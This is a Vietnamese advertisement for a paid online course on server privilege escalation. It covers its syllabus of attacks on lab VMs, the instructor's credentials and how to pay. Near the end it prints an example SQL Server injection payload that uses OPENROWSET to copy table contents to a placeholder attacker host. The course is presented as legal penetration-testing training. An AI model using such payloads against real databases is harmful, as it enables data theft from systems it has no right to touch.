ĐÂY LÀ KHÓA HỌC ONLINE 24/24 VỚI THỜI GIAN HỌC KHÔNG HẠN CHẾ - HỖ TRỢ VĨNH VIỄN

Các chuyên đề khóa học Cyber Security đang triển khai và update theo version mới nhất .
Và được review, test bởi các chuyên gia trong ngành nhằm đạt điều kiện mang tính thực tế và quan trọng phải thực sự dễ hiểu và dễ hiểu cho người học thì mới được Publish chính thức. Tất cả đều có học bổng giúp người học có động lực chiến đấu theo hướng tích cực nhất.

Lời Giới thiệu:

Thân chào các bạn, mình là Khoa NT - người trực tiếp sản xuất chuyên đề Advanced Hacking - Privilege Server Escalation

Đầu tiên mình thân gửi lời chào cảm ơn các bạn đã nhiệt tình đăng ký chuyên đề này.

Trước khi chính thức đăng ký để bắt đầu chuyến hành trình thú vị này, các bạn vui lòng tham khảo thông tin tổng quan bên dưới về chuyên đề mà mình đã dồn hết tâm huyết và trái tim để sản xuất.
Đây là
Khóa học online 24/24 với thời gian học linh hoạt, không hạn chế, hỗ trợ vĩnh viễn trong chuyên đề.

Hỗ trợ level | skill sets của bạn nâng cấp rất nhanh thành Security Expert | Ethical Hacker với kiến thức và kỹ năng thực tế nhằm bảo vệ hệ thống doanh nghiệp.

Luôn có những Server thiết kế đặc biệt để các bạn thực tập tấn công đúng nghĩa thực tế.

🌳 1 điểm khác biệt của program do mình design là nó sẽ giúp các bạn phải dựa vào tài năng của bạn để tấn công và bẻ khóa, ghi report những trải nghiệm kỹ thuật. Khi mà không còn giải pháp nào khác thì xem hướng dẫn rất dễ hiểu do mình ( Khoa NT ) để làm theo, sau đó sáng tạo lại hướng tấn công mới mang tính phong cách cá nhân của các bạn. Đây là cách học nhanh nhất, thực tế nhất.🌳

🌳Chắc chắn sẽ có những ưu tiên cho thành viên, vì chung quy mục đích cuối cùng là hỗ trợ nâng cấp chuyên môn là chính, kết nối giao lưu, chi phí chỉ là hình thức giúp các bạn có động lực lấy học bổng và tìm được cảm hứng sáng tạo để theo đuổi lĩnh vực này🌳.


Bạn sẽ đạt được những gì sau khi học xong chuyên đề Advanced Hacking - Privilege Server Escalation :

 • Có kỹ năng tấn công thực tế cụ thể ở mức độ Pre Advanced khi tấn công leo thang đặc quyền chuyên sâu chiếm quyền Admin trong hệ thống ( cụ thể là Root Access ) theo hướng đánh Privilege Server Escalation vào 3 máy Server khác nhau từ dễ đến khó.

 • Thực hành theo phương pháp training out-put hiệu quả. Vào thẳng trọng tâm luôn không có lan man. Biết đủ để phục vụ tốt cho mục đích thực tế vẫn hơn là biết nhiều mà không sử dụng được trong thực tế.

 • Master được các kỹ năng hay dùng cho red team phục vụ cho mục đích Legal Hacking, Ethical Hacking , Penetration Testing.

 • Có được sự tự tin rất lớn tăng dần qua mỗi bài tập tấn công , biết được cảm giác leo thang thâm nhập sâu vào system nó vui và hấp dẫn như thế nào.

 • Có Mindset tốt để phát triển sự nghiệp bạn theo hướng xa hơn, tích cực hơn, để bảo vệ hệ thống doanh nghiệp mà bạn đang làm việc.

 • Có khả năng tự học và tự phát triển kỹ năng theo phong cách cá nhân mang thương hiệu của chính Bạn.

 • Có được sự tự tin rất lớn tăng dần qua mỗi bài tập tấn công , biết được cảm giác leo thang thâm nhập sâu vào system nó vui và hấp dẫn như thế nào. Biết cách viết báo cáo report sau khi tấn công cho cấp trên hoặc cho khách hàng đối tác partners ra sao theo hướng quốc tế.

Chuyên đề này dành cho ai:

 • RED TEAM, thậm chí các bạn Blue Team hoàn toàn có thể tham khảo để bổ sung sức mạnh kỹ năng của mình nhằm bảo vệ system doanh nghiệp.

 • Những bạn muốn nắm vững 1 thế mạnh cụ thể, thực tế, thực chiến và kinh nghiệm để phục vụ cho công việc hiện tại hoặc muốn khởi nghiệp trong lĩnh vực này.

 • Những bạn đã có nền tảng chung nhưng vẫn chưa hiểu cụ thể bản thân mạnh ở điểm nào để kiểm tra và phát huy sức mạnh.

 • Những bạn đam mê lĩnh vực Hacking, Network Cyber Security, Infor Sec, Network Penetration Testing (NPT) mà không biết bắt đầu từ đâu

 • Những Network system admin, IT programmer muốn theo nhánh Cyber Security, Information Security nói chung và NPT nói riêng.

 • Những bạn muốn học từ những IT Instructor mà hiểu tâm lý các bạn cần gì, muốn gì, lúc nào cũng thân thiện và kiên nhẫn để hỗ trợ các bạn.

 • Cuối chuyên đề bạn có thể tùy chọn để được thi tổng kết những gì bạn đã học.

 • Phù hợp các bạn theo nhánh Red Team, Blue Team, Security Engineer, Pen Tester.

Điều kiện để học chuyên đề này:

 • Không cần phải có kiến thức trước đó về Network - Cyber Security, NPT, Infor Sec....

 • Chỉ cần bạn có đường truyền internet , và biết sử dụng máy tính căn bản mức độ xử lý các sự cố thông thường.

 • Lòng đam mê, ưa thích, kiên nhẫn theo đuổi lĩnh vực này.

KHÂU CHUẨN BỊ XÂY DỰNG BLACK BOX SYSTEM ĐỂ RED TEAM THỰC HÀNH TẤN CÔNG

Security Workshop Lab : Hướng dẫn từng bước triển khai nhanh nền tảng OS - Hosted Hypervisor - VM trên Windows 10 ( và 11 )

Security Workshop Lab : Hướng dẫn cách tạo ra máy để Red Team dùng thực tập tấn công.

(*) Riêng các Video Demo và Study Guide do mình hướng dẫn sẽ mang tính tương tác bạn học được kiến thức thông qua kỹ năng thực hành mang tính thực tế và kinh nghiệm cùng 1 lúc.

MISSION 1 - TẤN CÔNG LEO THANG ĐẶC QUYỀN SERVER CẤP ĐỘ TỪ DỄ ĐẾN TRUNG BÌNH
Nội dung hướng dẫn
Download file máy Server mang tên K1-Vulnerable về để import vào Oracle Virtual Box.

Hướng dẫn chi tiết và giải thích từng bước kèm kinh nghiệm để giúp học viên tiến hành thực tập tấn công trên môi trường hợp pháp.

Bài tập Case 1 dành cho học viên: Tiến hành tấn công leo thang đến mức tối đa để lấy quyền cao nhất là Root Access

(*) Riêng các Video Demo và Study Guide do mình hướng dẫn sẽ mang tính tương tác bạn học được kiến thức thông qua kỹ năng thực hành mang tính thực tế và kinh nghiệm cùng 1 lúc.

MISSION 2 - TẤN CÔNG OSCP SERVER LEO THANG ĐẶC QUYỀN CẤP ĐỘ TỪ TRUNG BÌNH ĐẾN KHÓ
Nội dung hướng dẫn
2.1 Download file máy OSCP Server mang tên OSCP về để import vào Oracle Virtual Box.

2.2 Hướng dẫn chi tiết cách tiếp cận từng vòng để tiến hành tấn công bài bản và giải thích từng bước kèm kinh nghiệm để giúp học viên tiến hành thực tập tấn công leo thang đặc quyền trên môi trường hợp pháp.

Bài tập Case 2 dành cho học viên: Tiến hành tấn công leo thang đến mức tối đa để lấy quyền cao nhất là Root Access mà không dùng đến công cụ.

(*) Riêng các Video Demo và Study Guide do mình hướng dẫn sẽ mang tính tương tác bạn học được kiến thức thông qua kỹ năng thực hành mang tính thực tế và kinh nghiệm cùng 1 lúc.

MISSION 3 - TẤN CÔNG LEO THANG ĐẶC QUYỀN CHUYÊN SÂU VÀO MÁY SQL SERVER CẤP ĐỘ TỪ TRUNG BÌNH ĐẾN KHÓ
Nội dung hướng dẫn
3.
0 Download file máy SQL Server mang tên SQL HACKING về để import vào Oracle Virtual Box.
3.1
Hướng dẫn Setup nhanh máy SQL mini Server cho Red Team thực tập

3.2 Tóm tắt toàn bộ kiến thức background về SQL Database cho Red Team nắm vững ở góc độ Security Expert nói chung, và kỹ thuật SQL Injection nói riêng

3.3 Hướng dẫn chi tiết cách tấn công leo thang đặc quyền vào máy SQL Srv mức độ 80% ( 20% còn lại dành cho Red Team xử lý )

Bài tập Case 3 dành cho học viên: Tiến hành tấn công leo thang đến mức tối đa để lấy quyền cao nhất là Root Access mà không dùng đến công cụ.

(*) Riêng các Video Demo và Study Guide do mình hướng dẫn sẽ mang tính tương tác bạn học được kiến thức thông qua kỹ năng thực hành mang tính thực tế và kinh nghiệm cùng 1 lúc.

CÁCH VIẾT 1 REPORT BÁO CÁO CHUYÊN NGHIỆP CHO ĐỐI TÁC SAU KHI TẤN CÔNG.

BONUS - NỘI DUNG CẬP NHẬT

Điểm đặc biệt là các chuyên đề do mình tâm huyết sản xuất luôn mang tính cập nhật theo định kỳ.
Và các nội dung này được update ở trong hệ thống online class.

Những đoạn code tấn công liên quan SQL Server , mình sẽ phân tích bổ sung trong phần update . Hầu như các tuts đa phần là chỉ tấn công, chứ không có giải thích chi tiết cho người xem họ hiểu sâu...

Ví dụ minh họa như :

insert into OPENROWSET('SQLoledb',

'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=hackersip,1433;',

'select * from table1')

select * from database..table1 insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=hackersip,1433;', '

select * from table2')

select * from database..table2

About IT Instructor - Mr. KHOA NT
I'm an Cyber Security Consultant | Analyst | Evangelist & Senior Security Engineer with 14 years of experience. I'm currently working in the Cyber Security realm as a Business owner and cooperate fully with other IT companies.

I also hold IT Security International Certifications such as: OPSWAT OECA|OLSA |OESA |ODSA |OSSA |NSE |SCNP |CEH | CompTiA Security+ |MCSE Security |MCTS |MCDST |CCNA.

And I've always had a passion for training, learning and sharing everything I knew in the Network - Cyber Security field.

Hướng dẫn đăng ký chuyên đề có học bổng

• Sau khi các bạn đã đọc tới cuối trang này và quyết định đăng ký học, xin chúc mừng và cảm ơn bạn đã có duyên lành với mình.
Các chuyên đề, khóa học do mình sản xuất đều tập trung vào chất lượng là chính và không chạy theo số lượng. Mục đích là để hỗ trợ bạn nào chắc bạn đó. Học phí chỉ là hình thức để lọc học viên thật sự muốn học để phục vụ công việc và các cơ hội thăng tiến của họ sau này.

• Trong vòng
2 ngày tham gia chuyên đề, nếu bạn làm hết bài tập quay màn hình gửi nội dùng về 3 bài tập từng nhiệm vụ đã mô tả trên khi tấn công chiếm quyền Admin ( Root Access) thì bạn sẽ được hoàn trả học phí. Nếu chỉ đạt được 1 trong 2 điều kiện thì bạn sẽ được tặng Voucher Bonus Code tiết kiệm 300.000 vnđ khi đăng ký các chuyên đề tiếp theo nha.

• Đã có rất nhiều bạn đạt học bổng và quan trọng hơn là tinh thần họ đã đươc refresh và tích cực chinh phục mục tiêu tiếp theo trong lĩnh vực Cyber Security. Còn bạn thì sao ? Chắc chắn bạn sẽ là người kế tiếp !!!

• Nếu sau
bạn làm không kịp thì cũng không lo lắng gì, vì account bạn có giá trị vĩnh viễn và bạn sẽ là thành viên chính thức, tiếp tục luyện tập và được sự hỗ trợ lâu dài của mình và trợ lý trong phạm vi chuyên đề này.

Bước 1:

Bạn chọn Thanh toán khoá học bằng cách chuyển khoản đến ngân hàng bên dưới :

NGÂN HÀNG VIETCOMBANK

0071005059259 | NGUYỄN TẤN KHOA

Chi phí: 1.000.000 vnđ ~ 1 triệu

Bước 2:

Bạn gửi email theo địa chỉ là dang.ky.hoc.it.sec@gmail.com đính kèm hóa đơn chuyển tiền của bạn, trong đó phần nội dung bạn ghi tên bạn, số phone, email của bạn.

 • Khi nhận được email bạn gửi đến, mình sẽ gửi lại cho bạn 1 tài khoản có thời hạn vĩnh viễn, mã kích hoạt khóa học và link truy cập lớp học online 24/24 tại system riêng , link group thành viên và kèm các material hướng dẫn đính kèm để bạn nắm chắc kiến thức hơn.
  Liên hệ: (Khung giờ phản hồi: 9AM-8PM VIETNAM - 9PM - 8AM CANADA )
  Email: dang.ky.hoc.it.sec@gmail.com
  Inbox FB: https://www.facebook.com/Huong.Dan.Tu.Hoc.An.Ninh.Mang.Infosec.Network